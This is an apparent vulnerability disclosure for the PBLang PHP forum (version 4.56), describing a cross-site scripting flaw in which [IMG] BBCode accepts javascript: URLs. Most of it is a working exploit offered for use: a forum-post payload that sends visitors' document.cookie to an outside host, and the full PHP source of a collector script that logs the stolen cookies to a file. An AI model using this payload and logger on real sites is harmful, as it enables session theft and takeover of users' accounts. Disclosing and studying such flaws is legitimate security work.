PBLang is a PHP-base forum. A security hole has just found in this product 

allows an attacker to steals cookies or does many things…



|--------------------------------------------|



Vulnerable systems: PBLang Forum

Version:   4.56 (4.5 RC 2)

Website: http://pblang.drmartinus.de/

Problem: Cross Site Scripting (XSS)



|--------------------------------------------|



When a you inserts [IMG]url[/IMG], PBLang’ll changes that text to < img 

src=“url” >. If someone inserts javascript:‘anyscript’() instead of the 

url, the JavaScript code is executed by Internet Explorer or some other 

web browsers.



EXPLOIT:



Inserting a new topic (or reply) with the following text will send 

visitor's cookies to your host. The output is saved to http://your-

host/cookies.txt .





[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape

(document.cookie), "subwindows", "height=100,width=486")[/IMG]

 



* Code of docs.php file:

*----------docs.php---------

<?php

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>"); 

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

} 

// get current date

$now = date("Y-m-d H:i:s"); 

// init

$myData = "[-----$now-----]" . LINE; 

// get

$myData .= getvars($HTTP_GET_VARS, ""); 

// file

$file = $REMOTE_ADDR . "cookies.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>



----------docs.php---------*